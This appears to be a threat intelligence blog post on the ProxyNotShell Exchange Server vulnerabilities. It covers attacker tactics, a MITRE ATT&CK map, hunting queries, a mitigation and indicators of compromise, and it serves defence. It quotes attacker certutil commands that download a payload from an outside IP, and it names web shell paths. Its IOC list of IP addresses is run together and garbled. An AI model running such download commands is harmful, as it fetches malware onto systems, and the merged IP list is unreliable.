Threat Brief ProxyNotShell (CVE-2022-41040 and CVE-2022-41082)


Executive Summary 

  • In August 2022, Vietnamese Cyber Security company GTSC discovered a new Microsoft Exchange zero-day vulnerabilities, that can cause Remote Code Execution (RCE) when it’s being triggered on a victim server and named as ProxyNotShell.
  • Exploitation of ProxyNotShell 0day vulnerability is very similar to ProxyShell (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207).
  • The 0day vulnerabilities were assigned CVE-2022-41040 and CVE-2022-41082 and rated with severities of critical and important respectively. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker.
  • The 0day exploit does require authentication, CVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. However, authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and they can be used separately.
  • After the exploitation of Microsoft Exchange Server, Threat Actors was using China Chopper web shell to obtain remote and persistence access on victims’ Exchange Server, attackers were being observed by Microsoft security intelligence while performing Active Directory reconnaissance and data exfiltration after the Initial Access phase.

Details of the Vulnerabilities

GTSC’s researchers discovered the following URL requests in a customer’s Microsoft Internet Information Services (IIS) logs : 

Same format as ProxyShell vulnerability.

The malicious URL requests appear to be identical to the ProxyShell requests seen last year. 

Attacks being reported by two zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker.

The researcher started researching and debugging Exchange de-compiled code to find the vulnerability and exploit code. As the researcher successfully uncovered the vulnerability and developed the exploit code for the new zero-day vulnerability, they submitted the vulnerability to the Zero Day Initiative (ZDI) to work with Microsoft so that a patch could be prepared as soon as possible. 

ZDI quickly verified and acknowledged 2 bugs, whose CVSS scores are 8.8 and 6.3, concerning the exploit. 

You can see ZDI confirm they accepted it here as ZDI-CAN-18333 and ZDI-18802

Attack Pattern and MITRE ATT&CK TTPs

According to GTSC, after the first successful exploitation of ProxyNotShell against victims Exchange Server, Threat Actors dropping a web shell on Exchange Server for gaining the remote access, remote connection between attacker and victim is done by a legitimate forum site which was being used as a command and control  server (C2) “137.184.67[.]33”

137.184.67[.]33 – Attackers Command and Control Server

Threat Actors also changes the content of the file RedirSuiteServiceProxy.aspx to webshell content. RedirSuiteServiceProxy.aspx is a legitimate file name available in the Exchange server.

Writed Web Shells and File Paths:

File NameFile Path
RedirSuiteServiceProxy.aspxC:\ProgramFiles\Microsoft\ExchangeServer\V15\FrontEnd\HttpProxy\owa\auth
Xml.ashxC:\inetpub\wwwroot\aspnet_client
pxh4HG1v.ashxC:\ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth

Open source webshell called as SharPyShell, has been used in some of the attacks. 

According to GTSC team, Threat Actors executed below command line arguments to download malicious files to victim network : 

(See the details about cerutil.exe abuse https://lolbas-project.github.io/lolbas/Binaries/Certutil/)

  • “cmd” /c cd /d “c:\\PerfLogs”&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t
  • “cmd” /c cd /d “c:\\PerfLogs”&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test

After the first exploitation, Threat Actors are observed during downloading second stage malware under “C:\PerfLogs\” or “C:\Users\Public\” file path and execute these files through WMIC. Some of the download malicious file was being used for Credential Dumping on LSASS.exe

MITRE ATT&CK Map : 

Technique NameID
Command and Scripting Interpreter: Windows Command ShellT1059.003
Windows Management InstrumentationT1047
Server Software Component: Web ShellT1505.003
OS Credential Dumping: LSASS MemoryT1003.001
Lateral Tool TransferT1570
Reflective Code LoadingT1620
Account DiscoveryT1087
File and Directory DiscoveryT1083
Process DiscoveryT1057

Threat Hunting Queries and Mitigations

Use this query to hunt for Chopper web shell activity:

DeviceProcessEvents| where InitiatingProcessFileName =~ “w3wp.exe”| where ProcessCommandLine has_any (“&ipconfig&echo”, “&quser&echo”, “&whoami&echo”, “&c:&echo”, “&cd&echo”, “&dir&echo”, “&echo [E]”, “&echo [S]”)

Use this query to hunt for suspicious files in Exchange directories:

DeviceFileEvents| where Timestamp >= ago(7d)| where InitiatingProcessFileName == “w3wp.exe”| where FolderPath has “FrontEnd\\HttpProxy\\”| where InitiatingProcessCommandLine contains “MSExchange”| project FileName,FolderPath,SHA256, InitiatingProcessCommandLine, DeviceId, Timestamp

URL Rewrite Rule:

We strongly recommend Exchange Server customers disable remote PowerShell access for non-admin users in your organization. Guidance on how to do this for single user or multiple users is available here.

Indicators of Compromise (IOCs)

Webshell:

File Name: pxh4HG1v.ashx
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx
File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx
File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx
File Name: Xml.ashx (pxh4HG1v.ashx and Xml.ashx, 2 files have the same contents)
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1
 Path: C:\inetpub\wwwroot\aspnet_client\Xml.ashx
Filename: errorEE.aspx
SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx

Downloaded Malicious DLLs :

SHA256: 074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82
45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9
9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0
29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3
c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2
76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e

IP Address Used by Threat Actor:

125[.]212[.]220[.]485[.]180[.]61[.]1747[.]242[.]39[.]9261[.]244[.]94[.]8586[.]48[.]6[.]6986[.]48[.]12[.]6494[.]140[.]8[.]4894[.]140[.]8[.]113103[.]9[.]76[.]208103[.]9[.]76[.]211104[.]244[.]79[.]6112[.]118[.]48[.]186122[.]155[.]174[.]188125[.]212[.]241[.]134185[.]220[.]101[.]182194[.]150[.]167[.]88212[.]119[.]34[.]11

URL:

hxxp://206[.]188[.]196[.]77:8080/themes.aspx

C2:

137[.]184[.]67[.]33


Leave a Reply

Your email address will not be published. Required fields are marked *